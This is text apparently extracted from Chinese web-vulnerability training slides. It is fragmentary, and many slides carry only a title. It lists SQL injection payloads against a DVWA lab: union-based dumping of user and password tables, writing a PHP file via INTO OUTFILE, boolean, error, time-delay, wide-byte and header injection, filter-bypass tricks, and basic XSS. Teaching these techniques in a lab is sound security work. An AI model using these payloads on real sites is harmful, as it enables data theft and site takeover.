1、WEB漏洞挖掘速成训练营姓名姓名Snow狼 CEO（照片部分由主办方添加）Web漏洞挖掘速成特训营非常非常非常详细的漏洞清单注入SQL注入漏洞HTML注入命令行注入JavaScript注入级联样式注入JSON注入1.Union注入2.Boolean注入3.报错注入4.时间延迟注入5.堆叠查询注入6.二次注入7.宽字节注入8.cookie注入9.XFF注入1.HEADER注入2.DOM注入3.COOKIE注入Web漏洞挖掘速成特训营SQL注入：1.Union注入2.Boolean注入3.报错注入4.时间延迟注入5.堆叠查询注入6.二次注入7.宽字节注入8.cookie注入9.XFF注入10.SQ

2、L注入绕过11.sqlmap编写Web漏洞挖掘速成特训营UNION注入Web漏洞挖掘速成特训营UNION注入id=1id=1 and 1=1id=1 and 1=2Web漏洞挖掘速成特训营UNION注入id=1 order by 8 Web漏洞挖掘速成特训营UNION注入id=1 order by 9Web漏洞挖掘速成特训营UNION注入id=1 union select 1,2,3,4,5,6,7,8Web漏洞挖掘速成特训营UNION注入id=1 union select 1,2,3,database(),5,6,7,8Web漏洞挖掘速成特训营UNION注入(select table_nam

3、e from information_schema.tables where table_schema=dvwa limit 1,1),5,6,7,8Web漏洞挖掘速成特训营UNION注入(select column_name from information_schema.columns where table_schema=dvwa and table_name=users limit 4,1)Web漏洞挖掘速成特训营UNION注入(select user from dvwa.users limit 0,1)(select password from dvwa.users limit 0,

4、1),(select user from dvwa.users limit 0,1)Web漏洞挖掘速成特训营UNION注入Web漏洞挖掘速成特训营UNION注入Web漏洞挖掘速成特训营UNION注入id=1 union select 1,2,3,(select 插进这里 into outfile/var/www/html/404.php;),5,6,7,8 Web漏洞挖掘速成特训营Web漏洞挖掘速成特训营Boolean注入id=1id=1id=1 and 1=2%23Web漏洞挖掘速成特训营Boolean注入id=1 and length(database()=4-+Web漏洞挖掘速成特训营B

5、oolean注入id=1 and length(database()=5-+Web漏洞挖掘速成特训营Boolean注入id=1 and substr(database(),1,1)=a-+Web漏洞挖掘速成特训营Boolean注入Web漏洞挖掘速成特训营Boolean注入(select table_name from information_schema.tables where table_schema=dvwa limit 1,1)Web漏洞挖掘速成特训营Boolean注入(select column_name from information_schema.columns where t

6、able_schema=dvwa and table_name=users limit 3,1)Web漏洞挖掘速成特训营Boolean注入获取GET参数idpreg_match判断是否含有union/sleep/benchmark等危险字符Web漏洞挖掘速成特训营报错注入updatexml函数payloadinsertdeleteupdateUPDATEXML(XML_document,XPath_string,new_value);Web漏洞挖掘速成特训营报错注入Web漏洞挖掘速成特训营报错注入username=1 and updatexml(1,concat(0 x7e,(select d

7、atabase(),0 x7e),1)-+Web漏洞挖掘速成特训营报错注入(0 x7e,(select table_name from information_schema.tables where table_schema=dvwa limit 1,1),0 x7e)Web漏洞挖掘速成特训营报错注入返回上一个函数的错误当输入username=1时，SQL语句为select*from users where user=1Web漏洞挖掘速成特训营时间延迟注入Web漏洞挖掘速成特训营时间延迟注入id=1 and if(length(database()=4,sleep(5),1)-+Web漏洞挖掘

8、速成特训营id=1 and if(substr(database(),1,1)=d,sleep(5),1)-+时间延迟注入Web漏洞挖掘速成特训营时间延迟注入Web漏洞挖掘速成特训营堆叠注入id=1%23Web漏洞挖掘速成特训营堆叠查询注入Web漏洞挖掘速成特训营二次注入Web漏洞挖掘速成特训营二次注入http:/192.168.1.7/test/sql/zhuce.php?username=woailuoinsert into users(username,password)values(woailuo,没加密码插什么);Web漏洞挖掘速成特训营二次注入Web漏洞挖掘速成特训营宽字节注入id

9、=1id=1Web漏洞挖掘速成特训营宽字节注入id=1%dfid=1%df%23Web漏洞挖掘速成特训营宽字节注入id=1%df union select 1,2,3,database(),5,6,7,8%23(select table_name from information_schema.tables where table_schema=(select database()limit 0,1)Web漏洞挖掘速成特训营宽字节注入Web漏洞挖掘速成特训营cookie注入Web漏洞挖掘速成特训营cookie注入Web漏洞挖掘速成特训营cookie注入Web漏洞挖掘速成特训营cookie注入W

10、eb漏洞挖掘速成特训营XFF注入127.0.0.1 and 1=2#-127.0.0.1 union select 1,2,3,database(),5,6,7,8#Web漏洞挖掘速成特训营XFF注入Web漏洞挖掘速成特训营绕过双写编码内联注释双写编码and 1=1 或者and 1=2error:1=1或者1=2aandnd 1=1或者aandnd 1=2我被注入了and 1=1或者and 1=2error:1=1或者1=2将and通过url全编码两次我被注入了内联注释and 1=1 或者 and 1=2error:bielaodawoleid=1/*!and*/1=1 或者id=1/*!an

11、d*/1=2我又被注入了Web漏洞挖掘速成特训营定义脚本优先级，多个tamper脚本使用声明该脚本的使用范围，可以为空Web漏洞挖掘速成特训营Web漏洞挖掘速成特训营HTML注入1.header注入2.cookie注入3.dom注入Web漏洞挖掘速成特训营HTML注入Web漏洞挖掘速成特训营HTML注入Web漏洞挖掘速成特训营HTML注入Web漏洞挖掘速成特训营HTML注入Web漏洞挖掘速成特训营命令执行漏洞Web漏洞挖掘速成特训营命令执行漏洞Web漏洞挖掘速成特训营级联样式注入Web漏洞挖掘速成特训营级联样式注入Web漏洞挖掘速成特训营级联样式注入i love fuluolibr anyth

12、ing=Web漏洞挖掘速成特训营级联样式注入Web漏洞挖掘速成特训营JSON注入Web漏洞挖掘速成特训营JSON注入Web漏洞挖掘速成特训营JSON注入Web漏洞挖掘速成特训营JSON注入Web漏洞挖掘速成特训营JSON注入Web漏洞挖掘速成特训营XSS跨站脚本攻击反射型XSS存储型XSSDOM型XSS非常超级详细的漏洞清单JSONHEADERINPUTCOOKIEWeb漏洞挖掘速成特训营反射型XSSWeb漏洞挖掘速成特训营反射型XSSWeb漏洞挖掘速成特训营反射型XSSWeb漏洞挖掘速成特训营存储型XSSWeb漏洞挖掘速成特训营存储型XSSWeb漏洞挖掘速成特训营存储型XSSWeb漏洞挖掘速成特训营DOM型XSS文档根元素 元素 元素 文本文档标题 元素元素元素属性href 文本我的链接 文本我的标题Web漏洞挖掘速成特训营DOM型XSSWeb漏洞挖掘速成特训营DOM型XSSWeb漏洞挖掘速成特训营DOM型XSSWeb漏洞挖掘速成特训营XSS语法及绕过 绕过双写URL编码大小写混淆 常用语句alert(/xss/)https:/ 学雷锋做好事从来不留姓名公司 还没创呢联系方式 手机欠费了